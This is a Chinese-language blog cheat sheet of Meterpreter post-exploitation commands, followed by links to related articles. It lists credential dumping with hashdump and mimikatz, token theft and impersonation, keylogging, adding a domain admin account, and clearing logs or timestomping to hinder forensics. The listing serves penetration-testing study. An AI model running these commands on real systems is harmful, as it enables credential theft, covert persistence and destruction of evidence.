[后渗透]获取到 Meterpreter 之后的操作
msf解决中文乱码问题:输入 chcp 65001(UTF-8) chcp 437(IBM437英语)
sysinfo
列出受控主机的系统信息
getuid
查看当前操控身份
ls
列出目标主机的文件和文件夹信息
use priv
加载特权提升扩展模块,来扩展meterpreter库
ps
显示所有运行进程以及关联的用户账户
getsystem
通过各种攻击向量来提升到系统用户权限
shell
以所有可用令牌来运行一个交互的shell
screenshot
对目标主机的屏幕进行截图
upload file
向目标主机上传文件
download file
从目标主机下载文件
keyscan_dump
存储目标主机上或许的键盘记录
getprivs
尽可能多的获取目标主机上的特权
background
将你当前的meterpreter shell转为后台执行
help
打开帮助
run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名
migrate PID
迁移到一个指定的进程ID
hashdump
导出目标主机中的口令哈希值
load mimikatz
加载mimikatz模块
msv
ssp
tspkg
wdigest
获取登录密码的hash值
kerberos
获取明文密码
mimikatz_command -f samdump::hashes
另一种方式获取哈希值
mimikatz_command -f sekurlsa::searchPasswords
另一种方式获取明文密码
portfwd add -l 3389 -r 192.168.206.200 -p 3389
把被攻击机的3389端口流量,转发到本地的3389端口上
use incognito
加载inconito功能(用来盗取目标主机的令牌或是假冒用户)
list_tokens -u
列出目标主机用户组的可用令牌
impersonate_token DOMAIN_NAME\\USERNAME
假冒目标主机上的可用令牌。
steal_token
盗窃给定进程的可用令牌并进行令牌假冒
drop_token
停止假冒当前的令牌
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。
execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。
execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。
add_user username password -h ip
在远程目标主机上添加一个用户
add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中
clearev
清除目标主机上的日志记录
timestomp
修改文件属性,例如修改文件的创建时间(反取证调差)
reboot
重启目标主机
rev2self
回到控制目标主机的初始用户账户下。
reg command
在目标主机注册表中进行交互,创建,删除和查询等操作。
setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。
uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。
use sniffer
加载嗅探模块
sniffer_interfaces
列出目标主机所有开放的网络接口
sniffer_dump interfaceID pcapname
在目标主机上启动嗅探
sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探
sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据
sniffer_stop interfaceID
停止嗅探
[后渗透]获取到 Meterpreter 之后的操作的更多相关文章
- 渗透攻防工具篇-后渗透阶段的Meterpreter
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...
- 后渗透之meterpreter使用攻略
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令.脚本及使用方式.包含信息收集.提权.注册表操作.令牌操纵.哈希利用.后门 ...
- Meterpreter后渗透之信息收集
在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp ...
- Meterpreter后渗透阶段之远程桌面开启
实验目的 学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面 实验原理 利用Meterpreter生成木马,利用木马控制靶机进行远程桌面的攻击 实验内容 利用Meterpreter后渗透阶 ...
- Metasploit Framework(8)后渗透测试(一)
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163. ...
- 超实用!手把手教你如何用MSF进行后渗透测试!
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目 ...
- 手把手教你如何用MSF进行后渗透测试!
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目 ...
- 7.Metasploit后渗透
Metasploit 高阶之后渗透 01信息收集 应用场景: 后渗透的第一步,更多地了解靶机信息,为后续攻击做准备. 02进程迁移 应用场景: 如果反弹的meterpreter会话是对方打开了一个你预 ...
- Metasploit简单使用——后渗透阶段
在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详 ...
随机推荐
- vs2019 netocore项目本地程序ip地址访问需修改的配置文件
IISPress启动项目后,打开IISPress托盘可以看到当前项目 根据图中标识出来的applicationhost.config文件路径,一般为你的项目解决方案目录下的.vs\解决方案文件夹\co ...
- 03、新手必须掌握的Linux命令
Ⅰ. 常用系统工作命令 1. echo 命令 echo命令用于在终端输出字符串货变量提取后的值,格式为"echo [字符串 | $变量]" 例:把指定字符串"LinxuH ...
- Java自学-接口与继承 内部类
Java 内部类 内部类分为四种: 非静态内部类 静态内部类 匿名类 本地类 步骤 1 : 非静态内部类 非静态内部类 BattleScore "战斗成绩" 非静态内部类可以直接在 ...
- 常用模块 - hashlib模块
一.简介 Python的hashlib提供了常见的摘要算法,如MD5.SHA1.SHA224.SHA256.SHA384.SHA512等算法. 什么是摘要算法呢?摘要算法又称哈希算法.散列算法.它通过 ...
- JavaScript 简单类型和复杂类型区别
一.基本类型 1.概述 值类型又叫做基本数据类型,简单数据类型.在存储时,变量中存储的是值本身,因此叫做值类型 2.基本类型在内存中的存储 基本数据类型存储在栈区中. 3.基本类型作为函数的参数 基本 ...
- iOS 关于NavigationController返回的一些笔记
1.理解NavigationController返回机制 一般NavigationController下的子view只有一层或者有很多层,子view返回最顶层则可以直接用 [self.navigati ...
- C语言深入学习
计算机存储篇 1.计算机对数据类型的辨别: 编译器在编译C程序时将其转变为汇编指令,其中指明了数据类型.此外,每种数据类型都有固定的存储长度,计算机运行程序时,会根据具体类型 读出相应长度的数据进行计 ...
- MVC4 Model View Controller分离成独立项目
适合人群:了解MVC项目的程序员 开发工具:vs2012 开发语言:C# 小项目或功能比较单一的项目可以直接新建一个MVC基本项目类型即可,但随着需求不断迭代,项目的功能模块越来越多,甚至有些模块可以 ...
- Codeforces Round #142 (Div. 1) C. Triangles
Codeforces Round #142 (Div. 1) C. Triangles 题目链接 今天校内选拔赛出了这个题,没做出来....自己思维能力还不够强吧.我题也给读错了.. 每次拆掉一条边, ...
- httprunner学习17-linux上安装httprunner环境
前言 如果你是在linux上安装httprunner环境,用的是python3的环境,安装成功后会发现hrun命令找不到,需添加软链接. 环境准备: centos 7.6 python 3.6 htt ...